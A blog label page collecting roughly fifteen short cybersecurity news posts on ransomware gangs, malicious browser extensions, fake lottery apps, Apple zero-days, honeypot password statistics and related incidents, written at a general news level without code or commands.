Search This Blog

Showing posts with label Cybersecurity. Show all posts

Active Threat of Black Basta Ransomware on US Companies by QakBot Malware

 


Recently Joakim Kandefelt and Danielle Frankel, researchers at Cybereason, a cybersecurity organization, announced that the Black Basta ransomware is operating a new campaign targeting U.S. companies with QakBoat malware. The malicious actors are trying to enter and later capture the organization’s network through this campaign. 

The threat actors use dangerous ransomware known as Black Basta Ransomware as a tool to capture the data of the victim’s network or system. This ransomware is specially targeted at organizations instead of individuals. Black Basta Ransomware captures and locks the data of the targeted organization by using encryptions that cannot be cracked without the specific decryption keys. 

Black Basta ransomware was first observed in April and was considered to be an outgrowth of the Conti ransomware. It uses the tested method of double extortion to extract confidential information from the targeted organization. After collecting this data, the cyber attackers use it to coerce the victim to get a ransom in exchange for the data. The attackers threaten the victim to release the information to the public in case the victim fails to pay demanded ransom. 

It is worth noting that Black Basta Ransomware attacks on a network make changes to the victim's desktop. These changes include renaming the original file name with the ‘.basta’ file extension, changing the desktop background with a new image, and creating a new file on the system as “readme.txt.” The wallpaper image includes a short message which directs the targeted users to open that text file. 

The prime target companies of the ransomware are from the U.S., Canada, Australia, and New Zealand. 

The QakBot, used in the latest campaign by Black Basta ransomware, dated back to 2019 and was highly used in many other ransomware attacks, like Fujifilm Holding Corp in 2020. The prominent factor of QakBot that made it the most used malware by attackers is that once the QakBot gets access to the target’s network, it also creates an entrance for the threat actor to deploy more malware. 

In a study of the campaign by Black Basta ransomware, it was observed that the minds behind this campaign are highly advanced and working sophisticatedly. In an attack under this campaign, the malicious actors get access to the domain of the victim’s network within 2 hours, and they can deliver the ransomware in just twelve hours. 

The Cybereason sent out a warning to organizations to be aware of and safeguard them from these attacks. There are certain precautionary measures that need to be followed. Firstly, the companies should be aware and avert infections from Black Basta and QakBot, and secondly, Cybereason customers should permit variant payload protection and obstruct vulnerable users and sources. 

Additionally, every organization should spot network connections that seem malicious. Resetting Active Directory access is also advised by Cybereason.

Understand BatLoader Malware and its Working


The BatLoader follows the common practice that all cybercriminals use to target victims and get maximum output. They prefer to target large organizations, companies, or firms instead of targeting individuals, as the profit of payoff from these firm attacks is huge than targeting potential individuals.

The researchers at VMware Carbon Black stated in their research that the operators of BatLoader are using a dropper to spread a variety of malware tools, along with a banking Trojan, an information stealer, and the Cobalt Strike post-exploit toolkit on the target’s system. 

The researchers at VMware also stated that “the threat actors utilize search engine optimization (SEO) poisoning to lure users to downloading the malware from compromised websites.” 

The research highlighted the similarity of BatLoader with Conti ransomware. The team at VMware found that some attributes in BatLoader's attack chain were similar to past incidents in Conti ransomware. 

Mandiant, a subsidiary of Google, has also pointed out the similarities in the techniques employed by BatLoader and Conti. However, the team at VMware clearly stated that there is no link to Conti in the origin of the BatLoader. 

The carbon Black MDR team of VMware has disclosed that there have been 43 successful attacks by BatLoader in the past 90 days. There were some unsuccessful cases also in which the threat operators successfully delivered the initial harm, but the victim did not use it, nullifying the harm. In a further report, the team mentioned the number of affected organizations and their sectors. They targeted five companies in the manufacturing industry, seven in financial services, and nine in business services. There were numerous cases of attempts in the education, IT, healthcare, and retail sector. 

BatLoader’s process of infecting the target’s system 

The process of infecting the target’s system by BatLoader includes incorporation inside Windows MSI installers for software like TeamViewer, LogMeIn, and Anydesk. 

After that, the criminals purchase the adverts to direct the victims to the replica websites like logmein-cloud.com. These purchased adverts pop up on the top of the page where users search for that software like Zoom, Anydesk, etc. 

Later, when the victims follow the adverts, download the software, and execute it, their system gets opened up for the threat actors. 

BatLoader has advanced capabilities, especially for harming businesses, as it is half-automated. It is controlled by a person or group of people in place of additional code. BatLoader operates by the “Living off the land” command to distribute more malware. 

“Living off the Land” attack denotes if the malicious actors have complete control of your system, they can utilize the pre-existing software like Windows PowerShell and scripting tools in your system to administer the system by directing commands without installing any other malware. 

The researchers concluded BatLoader is more dangerous because, after the installation and execution of links that include BatLoader, it will also download and install the banking malware and information. Along with it, the BatLoader can find if it has other linked networks, and it will install remote monitoring and management malware to target all connected systems. 

Even after updates in technology in cyber security, BatLoader and similar threats pose a clear need for more tools and knowledge to detect the source and block the spread of such threats. Considering the regular emergence of new threat vectors, the dynamic of threats is changing, and the demand for updated ways of fighting against these cyberattacks, opting for an online course for gaining cybersecurity knowledge is also an innovative decision to decrease the chances of facing losses due to cyber-attacks.

Faux Kerala Lottery Tickets Are Now Being Sold on Google Play

 


The Directorate of Kerala State's lotteries are being impersonated in the Google Play Store by dubious apps namely 'Kerala Lottery Online' and the 'India Kerala Lotter', cybersecurity researchers warned on Tuesday at the Kerala Lottery Online conference. 

The two Google Play Store applications have been downloaded over one million times. They were found to be impersonating the offline Kerala lottery which operates in an online mode. This is why they exist in the Google Play Store. 

In a recent report, the AI-driven cyber-security firm CloudSEK reported that the vast majority of campaigns were spread via referral links. 

It is evident on the referral link's landing page that threat actors mention that 5 percent of the winning amount will be shared among all the users of the referral link as well as a free entry into the prize draw for the referral link there. 

Kerala lottery has become one of the most popular lottery games in the world. Threat actors have taken advantage of its popularity by creating apps and websites offering lottery tickets and conducting lotteries. However, these lotteries were outlawed by the Kerala government, according to researchers at CloudSEK. 

During the fraudulent campaign, threat actors impersonated government agencies and created fake ads appearing on major social media platforms from accounts with a following of more than 200,000 followers to prove legitimacy. 

In addition, the makers of the dubious apps used the logos of Kerala State Lotteries, Kerala State, and the National Informatics Centre, in addition to Kerala State. The Kerala Lottery Department states that the state only sells paper lottery tickets and prohibits online sales, security researchers reported. 

It was discovered, both Kerala Lottery Online and India Kerala Lottery apps displayed the same privacy policy, however, they operated under different names, displaying similar information. 

The CloudSEK researcher's analysis explained that the application's contact section contains the following email addresses listed in the developer's contact section: OnlineKeralaLotto@gmail.com and Sanjaykhankerala@gmail.com. Consequently, CloudSEK pointed out that these emails indicate that the government entity is not operating the apps, as they indicate that the government entity is not operating them. 

There are several permissions that the applications ask for, and among them is permission to install packages. 

There were numerous Telegram groups, YouTube videos, Facebook posts, and Twitter posts promoting scam apps that were being spread by Telegram groups. 

The researchers stated, "Several websites have also been created to give legitimacy to these apps and promote them to make them appear legitimate".

Police Arrests A Suspect Over Election Vote Tampering


Suspect found tampering with elections 

The Pueblo Police Department has caught a suspect in association with a suspected case of voter machine tampering that happened at Pueblo Country election headquarters around one hour prior to the polls closing on June 28, 2022. 

31-year-old Richard Patton from Pueblo was arrested Thursday morning on account of election tampering and cybercrimes. 

As per state records, Patton is a registered Democrat. Pueblo Police Department has assured the community that all voter security measures were followed to protect the voting process and make it successful. 

Police Department assures no inform

No information has been compromised, and the investigation is ongoing. 

"Colorado law requires that tamper-evident seals are affixed to voting equipment under strict security requirements, including a chain of custody of election officials. Nobody else used the machine after Patton. The voting machine was taken into evidence, as well as security camera footage from that evening," said Pueblo Chieftain. 

What does the law enforcement report say?

Pueblo PD and the Pueblo County Sheriff's Office reports suggest that at 6 pm on election night, Patten went to the downtown office of the elections department to vote in person. 

All the registered Colorado voters are sent ballots in the mail however, one can also put a vote on in-person machines at registered sites. 

Election workers informed the police department that Patten asked them about the security situation before casting a ballot. 

Patton dropped off his ballot before he left the office, but the records prove that his ballot was cast. 

Soon after he left, an election worker went to clean the machine as per the covid protocols. 

The worker found an error code on the display of the machine that Patton used and informed supervisors. 

An error code was displayed on the screen. The Pueblo Chieftain reports:

"Drake Rambke, the election supervisor dispatched to Pueblo County after thousands of incorrect primary ballots were mailed to some Pueblo voters, told law enforcement that evening that he wasn’t sure if a USB device had been plugged into the machine, but multiple election workers said the seals on the voting machines had been tampered with."




The RCE Vulnerability in ConnectWise Has Been Resolved

 


As part of the ConnectWise Recover and R1Soft Server Backup Manager (SBM) secure backup solutions, ConnectWise has released security updates that address a critical vulnerability within those products. 

In an advisory published by the company today, the company describes the security flaw as being due to an injection vulnerability. This occurs when special elements in output are not adequately neutralized before entering a downstream component. 

Among the affected software, versions are ConnectWise Recover, earlier versions of the product, and R1Soft SBM versions 6.16.3 and earlier versions. 

Several security researchers have reported that this is a critical vulnerability that could expose confidential information or allow attackers to execute code remotely using the vulnerability.

Additionally, it categorized this as a high-priority issue, meaning that it may be exploited in attacks or at a high risk of being targeted in the wild if it is not addressed immediately. 

In a report released by Huntress Labs CEO Kyle Hanslovan, security researchers have discovered, rediscovered, and expanded on the vulnerability discovered by Code White security researcher Florian Hauser. According to Huntress Labs CEO Kyle Hanslovan, the vulnerability can be exploited to spread ransomware to thousands of R1Soft servers exposed to the Internet. This is done via R1Soft servers exposed to the Internet. 

Approximately 4,800 R1Soft servers that are exposed to the Internet may be vulnerable to attacks as a result of this RCE bug. According to a Shodan scan, these servers may not be patched since ConnectWise has released patches for this issue. 

There have been automatic updates applied to ConnectWise Recover SBMs that have been impacted by the vulnerability (v2.9.9), ConnectWise announced. 

It should be noted that Cryptree users are being advised to upgrade their R1Soft backup manager to the latest release, SBM v6.16.4, released on October 28, 2022, by following the steps detailed in the R1Soft upgrade wiki.

As part of the company's recommendation, all R1Soft backup servers that are impacted should be patched as soon as possible. 

Even though patching critical vulnerabilities is always something that cybersecurity professionals are strongly encouraged to do, they do not think it is wise to do it on a Friday evening, as it can be a potentially disastrous timing decision. 

As a result, all Internet-exposed servers such as websites will be compromised to the fullest extent by malicious actors as soon as they discover a vulnerability. 

There is also a tendency for hackers to be especially active on weekends since most IT teams and security teams are away from their computers during these busy times. 

As a result of an end-of-the-week release, it is also more difficult to patch any vulnerable servers before the weekend, potentially exposing more systems for a few days to attack, especially if the release takes place along with a holiday weekend. 

There is a concern that not patching the R1Soft SBM backup solution quickly may lead to a significant security incident. This is because the R1Soft SBM backup solution is a popular tool among managed service providers and cloud hosting providers.

Remove These Malicious Chrome Extensions With 1 Million Downloads

 


An extension for your browser can enhance your online experience in several ways. Translations, conversions, spellchecking, shopping, and blocking popup ads are some of the services they can assist you with. You can customize your browsing experience using these extensions, and you may even be able to alter the way websites are displayed. There are several popular extensions available for Chrome, but the dark mode is an example.

It is imperative to remember that not all extensions are safe. By giving them access to such information, such as your personal information, you are giving them a lot of power. 

Although some extensions store this data for convenience, others use it to track you or launch a cyberattack against your computer. A malicious Chrome extension was recently reported to have been downloaded 1.4 million times since it first appeared on our site.

The cybersecurity firm Guardio Labs reports that a newly discovered malicious advertising campaign has been discovered in which Chrome extensions are used to hijack web searches and embed affiliate links into any other websites you visit.

The company's security researchers have dubbed this advertising campaign "Dormant Colors" since all of the malicious extensions in question offer color customization options for Chrome, which makes them the right candidate for being dubbed a malicious advertising campaign. However, the extensions themselves do not include malicious code when installed. This is how they were able to bypass Google’s security checks and end up on the Chrome Web Store in the first place. 

Extensions for Google Chrome - Dormant Colors

Following a thorough investigation into this matter by Guardiothis campaign use ad, it was found that there were thirty different versions of these malicious browser extensions available on both the Chrome and Edge web stores with more than a million installations altogether. They have been removed from both web stores, as we mentioned before, but just in case, here is a complete list of all the products that have been removed:

• Action Colors 
• Power Colors 
• Nino Colors 
• More Styles 
• Super Colors 
• Mix Colors 
• Mega Colors 
• Get colors 
• What color 
• Single Color 
• Colors scale 
• Style flex 
• Background Colors 
• More styles 
• Change Color 
• Dood Colors 
• Refresh color 
• Imginfo 
• WebPage Colors 
• Hex colors 
• Soft view 
• Border colors 
• Colors mode 
• Xer Colors 

 Explanation of how to remove Chrome extensions manually 

There are several malicious extensions listed below that have since been removed, but you may need to manually remove them by clicking on the three dots menu at the top right-hand corner of your Chrome browser to remove them permanently. Upon clicking 'More', you will be taken to the More tools section where you will be able to access Extensions.

Making money by hijacking your browser to make money from clicks on the ads 

The cybercriminals behind this campaign use ads and redirects to trick unsuspecting users into installing their malicious extensions. This is done when they visit sites that offer the opportunity to play videos or download files. This is done so that they can then go one step further and download malicious extensions. 

There are two sites where you can watch videos or download programs. However, when you click the videos or download programs link, you are redirected to another site that requires you to add an extension before you can continue. It is quite likely that you will be prompted to install a color-changing extension when you click either the 'OK' button or the 'Continue' button. This extension initially seems harmless on the surface. 

The problem with these extensions is that once installed, their purpose is to redirect users to pages that redirect them to malicious scripts that side-load malicious scripts that show how to perform search hijacking for the extensions, but also that tell the extensions what sites affiliate links can be inserted on to generate affiliate revenue. The creator of these malicious extensions earns a lot of money from these advertisements, which are sold to third parties for profit, which is known as search data. 

It is also possible to use these Dormant Colors extensions for automatic redirects to the same page with affiliate links added to the URL of each page instead of redirecting users to an entirely different page. Whenever anyone purchases an extension on any of these sites, the developers of such an extension will receive a commission for their work. 

Guardia, in a blog post, tells that the malicious extension campaign may have the potential to spread further over the coming weeks. "As this campaign continues to run, it is shifting domains, generating a wide assortment of extensions, and re-inventing several color-and-style-changing functions you are sure to be able to do without."

It is also worth mentioning that the code injection technique analyzed here provides the mitigation and evasion measures necessary to contribute to further malicious activities in the future, especially since it is a huge infrastructure for mitigation and evasion. 

The most effective way to keep your browser from getting infected by malicious extensions 

The most appropriate time to make sure you have an effective antivirus solution installed on your laptop or PC is before you add any additions to your browser, especially if you plan on adding any new extensions to it. In this way, you will be able to protect yourself against malware infection or having your personal information stolen and misused. 

Additionally, when you install any extensions, be sure to only use trusted sources, such as the Chrome Web Store or the Microsoft Edge Add-ons store, as these are both reliable sources. The fact that malicious extensions do slip through the cracks from time to time does not change the fact that you are still safer when you install browser extensions from an official store rather than from the web.

Additionally, you should always ask yourself whether or not you need an extension before downloading it. Do you need it, or do you just want to use it? When you come across an extension that seems too good to be true, then you can be certain that it is and is not worth downloading. In addition to checking the extensions in your browser regularly, you might also want to consider adding new ones. 

You need to regularly take a look at the extensions you have installed in your browser and make sure they are still relevant. Delete any of these that you no longer need. Also, keep an eye out for any new ones you may not have noticed you have added without your knowledge. Using browser extensions, you can add all kinds of new features and options to your browser that are not available in its built-in functionality. 

Kill Switch: Your VPN is Useless Without This Essential Security Feature

 

Kill switch has turned out an essential security feature for VPN. If your virtual private network does not have a kill switch, internet users might have to look for a new VPN provider. 

In the instance, one’s VPN connection drops for any reason, a kill switch will immediately shut down the user’s internet connection. Thus, playing the role of a crucial VPN security feature, the kill switch ensures that the user data does not leak outside the VPN tunnel or be exposed online unencrypted – that may turn dangerous in many situations. 

Using a VPN, the user’s internet traffic is routed to a secure server at a location of his choice over an encrypted tunnel.  

Eventually, the user’s IP address will change to that of the server he is connecting to. This process not only allows access to geo-restricted content but also hides the user’s original IP address and internet traffic from ISP, government agencies, threat actors, and anyone who might be a threat to their online data.  

Why do VPN disconnections occur? 


Since no technology is error-free, even the best VPNs can have connection drops time and again. VPN disconnection happens for several reasons, some of which are listed below:  

• The user is using a weak or congested Wi-Fi connection — like a public Wi-Fi hotspot in a coffee shop, hotel, or airport. • User is switching to a different Wi-Fi network or switching from Wi-Fi to mobile data. • The computer goes to sleep. • An antivirus program or firewall on your computer is interfering with your VPN connection (in this case, make sure to whitelist your VPN software). • User is jumping from one VPN server to another, or they are frequently switching from one server to another, exceeding their VPN provider’s concurrent connection limit. • They use the OpenVPN UDP protocol, which is less stable than the TCP protocol (switch to TCP if you notice your VPN dropping). • The VPN server they are connecting to is down. • VPN app crashes.  

What if your VPN disconnects without a kill switch? 


In case a user’s VPN disconnects without enabling a kill switch, this will leave the internet connection active, exposing the user’s true IP address and web traffic the moment the disconnection continues unencrypted. 

As a result, the user’s online activities will be exposed, compromising any sensitive personal data one may have been accessing while connected to the VPN. A user can as well compromise his true location based on the exposed IP address. 

This could be problematic if the user is using VPN to access geographically restricted content and for professionals who use a VPN for crucial privacy needs. Using kill switch reduces the risk of such situations. 


How does a VPN kill switch operates? 


A VPN kill switch, when enabled continuously monitors the user’s VPN connection and scans for any change in his IP address or the status of one’s network. The kill switch will engage and block access to the internet connection in an instant if it detects any change in either. 

After the user reconnects to the VPN or the VPN tunnel reestablishes automatically, the kill switch will then allow the internet to reconnect, while still continuously monitoring the VPN connection.

Iran’s Atomic Energy Organization Confirms E-mail Hack

 

The Atomic Energy Organization of Iran (AEOI) has confirmed that an anonymous “foreign country” has hacked an e-mail server belonging to one of its subsidiaries and allegedly published the information online, as per reports. 

The Iranian threat actor, named ‘Black Reward’ in a statement posted on his Twitter handle says that it has released the hacked information relating to Iranian nuclear activities. The hackers describe their action as an act of support for the Iranian protesters. 

The said protests continue in Iran after the death of Mahsa Amini (22-year-old) in September, who apparently died in police custody for not following the strict Islamic dress protocol of the country. The violent protest and street violence resulted in several deaths of protesters, along with that of security force staff. Furthermore, hundreds of demonstrators have allegedly been detained. 

A statement published by the Black Reward on Saturday showing support for the protests, read “In the name of Mahsa Amini and for women, life, and freedom.”  

The hacking group threatened the Iranian state to leak the hacked documents of Tehran’s nuclear program if they would not release all the prisoners and people detained in the protests, within 24 hours. Additionally, the group demands the release of political prisoners, claiming to have leaked 50 gigabytes of internal emails, contracts and construction plans relating to the country’s Russian-sponsored nuclear power plant in Bushehr, publishing files on its Telegram channel. 

According to the statement shared by the hacking group, the released information includes “management and operational schedules of different parts of Bushehr power plant,” passport and visa details of Iran and Russia based specialists working in the power plant and “atomic development contracts and agreements with domestic and foreign partners.” 

Although the atomic energy organization’s general department of public diplomacy and information denied the relevance of the released data, stating “this move was made with the aim of attracting public attention” 

“It should be noted that the content in users’ emails contains technical messages and common and current daily exchanges […] It is obvious that the purpose of such illegal efforts, which are carried out of desperation, is to attract public attention, create media atmospheres and psychological operations, and lack any other value,” the organization confirmed.

The TommyLeaks and SchoolBoys Ransomware Gangs Share a Common Enemy

 



New extortion gangs, TommyLeaks and SchoolBoys, have emerged out of China attacking companies around the world with dangerous extortion threats. Even though they are both connected, there is one catch - both are part of the same ransomware gang. 

Earlier this month, security researcher MalwareHunterTeam warned of a new extortion gang called TommyLeaks that was trying to extort companies. 

As a result of the hacking group's activity, companies claim it has breached their networks, stolen data, and demanded a ransom not to leak this data. In a recent report, BleepingComputer reported that ransom demands ranged from $400,000 to $700,000. 

MalwareHunterTeam discovered yet another ransomware extortion gang in October, dubbed 'SchoolBoys Ransomware Gang'. They claim to use ransomware to steal data from victims and encrypt their devices as part of their attacks as part of their ransomware extortion campaigns.

Threat actors steal data during their attacks. However, as of yet, no site with public data leaks is known to have been used by threat actors to leak that data. 

Even though there was nothing that connected the two groups at the time, they both used the same Tor chat system to negotiate over the privacy of their members.

What is even more suspicious about the use of this particular chat system is that it had only ever before been used by the Karakurt extortion group.

BleepingComputer reported this week that TommyLeaks and SchoolBoys Ransomware Gang are both part of the same extortion group called the SchoolBoys Ransomware Gang, also called TommyLeaks.

During a SchoolBoys negotiation chat that BleepingComputer saw, the threat actors appeared to address their victim as TommyLeaks in their attempt to coerce a ransom payment from him. 

Even though it is not entirely clear why they are using two different names as part of their operation, they may be trying to take a similar approach to Konti and Karakurt in terms of the operation. 

As previously reported by BleepingComputer, AdvIntel CEO Vitali Kremez has revealed that Karakurt is a member of the Conti cybercrime syndicate and a member of the DefConti crime family. 

During attacks on Conti's ransomware encryptor, the malware's hackers blocked Conti's encryptor. They then extorted the victim using data that was already stolen under the Karakurt name rather than the Conti brand to gain access to the data. 

To take it one step further, as the TommyLeaks/SchoolBoys group uses the chat system as Karakurt, we may be seeing a rebrand of the Conti offshoot into these newer brands.

While it is too soon to tell if this is what is occurring, the extortion group is one that enterprises need to keep an eye on as they are targeting entities of all sizes.

Data From Honeypots Shows Bot Attack Trends Against RDP, SSH



Rapid7's RDP and SSH honeypots were used to collect data over nine months between September 10, 2021, and September 9, 2022. This resulted in the discovery of tens of millions of attempted connection attempts during this timeframe. Honeypots were set up over two weeks in which they captured 215,894 unique IP source addresses, 512,002 unique passwords, and both RDP and SSH honeypots. A large portion (99.997%) of the passwords can likely be found in the text file rockyou2021.txt.

The Rockyou website was hacked in 2009 as a result of a security breach. Consequently, 32 million user accounts were found in cleartext by the attackers, and they stole them. There was an exposed list containing 14,341,564 passwords that eventually turned into the original rockyou.txt list of passwords. This list was widely used in dictionary attacks and is included with Kali Linux as an aid to penetration testing.

There have been numerous password lists added to the original over the years, and updated ones are constantly being added. A result of this research is the rockyou2021.txt collection, which comprises about 8.4 billion records. It is a 92 GB text file that contains about 8.4 billion passwords. There is a pre-release version of the code on the GitHub website for free download. 

Rapid7 explains in its report titled Good Passwords for Bad Bots (PDF), "We use the RockYou set of passwords as a source of passwords that attackers could generate and try to see if there was any evolution beyond the use of a password list." 

The fact that 99.99% of the passwords used to attack Rapid7 honeypots can be found on this password list probably comes as no surprise. This is because most of the passwords used are very common. There are only 14 of the 497,848 passwords that are not included in rockyou2021, out of 497,848 passwords that are involved in the SSH attacks.

There is also an IP address included with each of these files that represent the honeypot that has been hacked. As per Rapid7, there may have been a programming error in the scanner used by the attacker, which in turn makes this situation seem more likely.

In rockyou2021, only one password among those used to attack the RDP honeypots is not included among those that were used in the attack. There was a password 'AuToLoG2019.09.25' that was the thirteenth most prevalent in the entire country. This is a bit puzzling, but the report notes there are malware samples containing the ‘AuToLoG’ string. “The samples are classified as generic trojans by most antivirus vendors but appear to have RDP credentials hardcoded into them,” adds the report.

Besides the SSH mistakes in the example above and the one AuToLog password that was used to access the honeypot, every other password that was used in those honeypot attacks can be found in rockyou2021. In general, honeypot attacks are automated opportunistic bot attacks that prey on weak signals and extract data from them.

During Rapid7's analysis of the passwords that were used, the company found that standard, well-known passwords were preferred over less common passwords. The top five RDP password attempts were: (the empty string), '123', 'password', '123qwe', and 'admin', with '' (the empty string) coming in second. According to the statistics, 123456, nproc, test, qwerty, and password were the top five SSH password attempts over the last 12 months. All of these passwords, as well as all of the others, could have been obtained from rockyou2021.

Rockyou2021 is effectively nothing more than a massive list of words. Random ASCII and mixed ASCII string strings as well as special character strings do not fall under the definition. The number of possible ASCII seven-character strings is approximately 8.4 billion, which would mean that if we added up every possible variation of ASCII seven characters, it would take around 70 trillion possibilities to find the complete set.

With the length of a password being increased, the probability that this would happen will rise dramatically. From Rapid7's analysis, the overriding conclusion is that the use of long, strong random strings like those generated by password manager applications and which are not likely to be included in dictionaries would provide a very strong defense against opportunistic bot-driven automated attacks that are carried out by hackers.

Despite their low costs, Tod Beardsley, Rapid Seven's director of research, advises that these automated attacks are not complementary to each other, but are rather low-cost. As a result, this indicates that password managers are currently not the default method of generating and storing passwords, which signifies that this needs to change. It is imperative to note that password managers have one major drawback, which is that they are not always intuitive or easy to use.

Web3: Cybercrime May Come to an End, Here’s How

 

Cybercrime has increasingly surged at a high rate in the U.S. Annually, cybercrime amounts to damage worth trillion dollars. One of the top cyber threats has been digital identity theft, in which threat actors leverage the stolen personal information of the victims, with the intent of causing financial havoc. 
The issue of cybercrime has persisted over the years and is certainly not going away anytime soon. In regard to the issue, the CEO of Sony, said, “the solution to cybercrime isn’t two-factor identification or your mother’s maiden name. The solution to cybercrime lies in the transition to Web3.” 

What is Web3?  


Web3, also known as Web 3.0 serves as the succeeded iteration of the internet after Web 2.0. While Web 2.0 is marked as a centralized internet model in which most of the data, content, and other services are controlled by some of the internet giants, also referred to as ‘Big Tech.’ 

WWe3 on the other hand can be described as a decentralised version of the internet, allowing users to communicate with one another in a secure, peer-to-peer environment.  

How are users vulnerable to Web2? 

Since a “digital identity” in Web2 includes more than just a username and a profile picture, a user is supposed to enter a verifiable email address in order to create an identity.  

Certainly, there is no limit to how many email addresses can one user make. Most of the users have multiple email addresses, serving different purposes, such as personal usage, work communication, spam filtering, etc. 

As there is no method to confirm that the person logging in is who they claim to be, beyond the two-factor identification, employing this means anyone with the credentials can get into any of these emails.  

Adding to the misery, once a company gets hold of a user’s personal data, he practically has no control over it. Thus, personal information is sold for the sake of targeted adverts. The data access and secondary sale increase the opportunities for a threat actor to exploit it. 


How is Web3 solving the problem?  


Login security: Centralized authorities would not control the user in the future. It will be as simple as utilising a biometric unlock with the use of DIDs and Blockchain-backed verification.  

Bots are always searching the internet for stray credentials that they may use to access bank accounts, emails, and other accounts. This will be stopped in its tracks by consolidated digital identities that are accessed by biometric logins.  

Control and Monetization of User Data


With the consolidated digital identity, a user can now utilize the data as they see fit, since he has overall control over who sees the data and who has to pay for the same. For an instance, one could build a decentralised ad network on Web3 and allow users to either opt in or out of the system.  

Although, Web3’s growing popularity is being considered the ‘next big revolution’, in digital tech, for its take on making lives easier for the unbanked and others involved in it. It still needs much improvement in regard to risks pertaining to the loopholes and potential vulnerabilities that could cause a great many problems in the future.

OpenAI : Students are Using AI Tools to Write Paper for Them

 

University students are acing in their examinations through the dedicated hours given to their advanced language generators and AI language tool such as OpenAI playground. 
 
According to Motherboard, these tools help students write their papers effortlessly, as, in these AI-produced responses, it is hard to detect if it is ‘not’ written by the student himself. Since these responses cannot even be detected by plagiarism software, schools and universities may find it challenging to counteract this next-generation subversion. 
 
In an interview with Motherboard, a student who goes by the Reddit username innovative_rye says "It would be simple assignments that included extended responses." 
 
"For biology, we would learn about biotech and write five good and bad things about biotech. I would send a prompt to the AI like, 'what are five good and bad things about biotech?' and it would generate an answer that would get me an A," he added. 
 
In addition to this, innovative_rye also describes how using AI tools helps him in focusing on what he thinks is important. "I still do my homework on things I need to learn to pass, I just use AI to handle the things I don't want to do or find meaningless," While it is still a debated topic whether AI-generated writing should ever be considered an original work or not, since it is undetected in plagiarism software, they see these AI-made prompts as original works.  
 
If only the plagiarism software were capable of generating these AI-generated writings, it would not have been a problem. However, it is still a question of if and when software will be able to catch up with AI.  
 
"[The text] is not copied from somewhere else, it's produced by a machine, so plagiarism checking software is not going to be able to detect it and it's not able to pick it up because the text wasn't copied from anywhere else," says George Veletsianos, Canada Research Chair in Innovative Learning & Technology and associate professor at Royal Roads University. 
 
"Without knowing how all these other plagiarism checking tools quite work and how they might be developed in the future,[...] I don't think that AI text can be detectable in that way." He continued. 
 
While it is truly an issue of concern for the teachers as these students are definitely cheating in their papers, the AI tools also raise questions of whether the learning is moving forward for the generation.

A Constant Battle Between Apple and Zero-Day Security Vulnerabilities

 


Recently, there has been a noticeable increase in the number of attackers targeting Apple, especially by using zero-day exploits. Among the main reasons why hackers like zero-day exploits so much are because they might just become the most valuable asset in a hacker's portfolio. As of 2022, Apple has discovered seven zero-day vulnerabilities in its products and has followed up on these discoveries with relevant updates to address these issues. Even so, it seems as though there will not be an end to this classic cat-and-mouse game anytime soon.

During 2021, there were more than double the amount of zero-days recorded, compared to the same year in 2020. This is the highest level since tracking began in 2014, with the number of zero-days increasing every year since then – the trend has been demonstrated by the repository maintained by Project Zero. 

As described by the MIT Technology Review, the increase in hacking over the past few years has been attributed to the rapid proliferation of hacking tools globally and the willingness of powerful state and non-state groups to invest handsomely in discovering and infiltrating these operating systems. Threat actors actively search for vulnerabilities and then sell the information about those vulnerabilities to the highest bidder.

Apple has repeatedly been compromised by these attackers. In 2022, Apple, one of the four most dominating IT companies in the world, is advancing into a year where it is welcoming a new year with two zero-day bugs in its operating systems, a WebKit flaw that could have left users' browsing data vulnerable and after recovering from 12 recorded exploits and remediations in 2021, they have been hit by two zero-day bugs in their operating systems. 

The company released 23 security patches less than one month after it discovered these issues. A new flaw was discovered that could be exploited by attackers to exploit a user's device if certain malicious websites are loaded onto a user's device, leading to an infection of their device.

Keeping this in mind, if we fast forward to August 17 of this year, we learn Apple has discovered two new vulnerabilities in its operating system  CVE-2022-32893 and CVE-2022-32894. The first vulnerability is a remote code execution (RCE) vulnerability in Apple's Safari Web browser kit, which is used by all browsers that are iOS-enabled and macOS-enabled. As for the second vulnerability, another RCE vulnerability, it gives attackers complete access to the user's software and hardware without any limitations. 

In the past couple of weeks, two major vulnerabilities have been found that affect a wide variety of Apple devices  especially the iPhone 6 and later models, the iPad Pro, iPad Air 2 onwards, iPad 5th generation and newer models, iPad mini 4 and newer versions, iPod touch (7th generation), and macOS Monterey. The officials updated the security systems to create a protected environment against “actively exploited” vulnerabilities.

The research team at Digital Shadows prepared a report which included that the Zero-day exploits sell for up to $10 million, which is the most expensive commodity in a rather wide array of cybercrime. The report further added that these exploits in the market are bound to expand and provoke more cyber threats.

Five Suspects Charged for $2.5 million Worth NFTs Theft, Targeting Bored Ape NFT Owners

 

On Wednesday, October 12, five crypto scammers in France faced allegations of collaborating in a phishing scam and were consequently charged. Allegedly, the suspects have audaciously acquired and resold $2.5 million worth of blue chip non-fungible tokens (NFTs). The phishing scam prominently targeted Bored Ape Yacht Club (BAYC) and Mutant Ape Yacht Club (MAYC) owners. 
 
As per the prosecution, the alleged suspects leveraged a phishing scam in order to steal the assets, enticing victims through a fake website, while promising to animate their NFTs, reports Agence France Presse (AFP) in a post by Barrons. 
 
The charged suspects aged between 18 and 24, are residents of Paris, Caen, and Tours. Two of the five scammers are charged with manufacturing the fraudulent phishing site that enabled the theft. The rest three were accused of taking charge of advertising and money laundering aspects of the phishing, says deputy chief of France’s cyber-crime authority, Christopher Durand. 
 
The prosecution charges included “fraud committed as a part of criminal gang, concealing fraud and criminal association.” The subjects have been placed in pre-trial detention by the French authorities, along with their parents. The parents of one of the accused have also been arrested, but later they were released without charge. 
 
The deputy chief says that the probe was initially started as a result of an investigation by well-known Twitter user “ZachXBT" ZachXBT, describing himself as an “on-chain sleuth" in a blog post mentioned how the Twitter user “Dilly Dilly" had clicked on a link shared by “a verified member of the BAYC Discord" and consequently had his BAYC NFT stolen after approving a transaction on website that “he was lead to believe would produce an animated version” of his NFT.  
 
ZachXBT claims that after selling the stolen tokens on the NFT marketplace Opensea, the accused tried to hide the tracks by using the now-sanctioned Tornado Cash protocol. 
 
A report by blockchain analytics firm Elliptic suggests that over $100 million worth of NFTs being stolen between July 2021 and July 2022. Along with these recent incidents, NFT fraud seems to be rapidly booming in general and thus has sparked security concerns.  
 
This news sees the light of day when the firm behind the Bored Ape collection, Yuga Labs is under investigation for its business practices. Although the organization has not yet been charged with any misconduct, the Securities and Exchange Commission (SEC) is now investigating the start-up, to check if the anonymous sources reported by Bloomberg are true.

Cyber-Spy Exploits are Being Dropped by Drones


